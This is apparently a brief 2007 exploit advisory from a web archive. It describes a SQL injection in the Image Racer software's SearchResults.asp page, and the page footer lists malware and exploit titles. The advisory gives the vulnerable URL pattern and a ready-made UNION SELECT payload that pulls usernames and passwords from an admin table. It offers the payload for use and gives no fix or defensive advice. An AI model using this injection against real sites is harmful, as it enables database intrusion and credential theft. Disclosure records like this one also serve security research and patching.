imageracer-sql.txt

Posted on 24 July 2007

__________________ Aria-Security Team __________________ Image Racer SearchResults.asp SQL Injection Vendor: http://www.junctionquest.com/Software.asp Example: http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0 Example : -1 'union select username,password from admin where [FIND IT YOUR SELF]=1 ------------------------------------------------ Credits: Aria-Security Team http://aria-security.net/ Personal Blog: http://outlaw.aria-security.info

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection
htmlLawed 1.2.5 Remote Command Execution
Online Tours And Travels Management System 1.0 SQL Injection

Last 20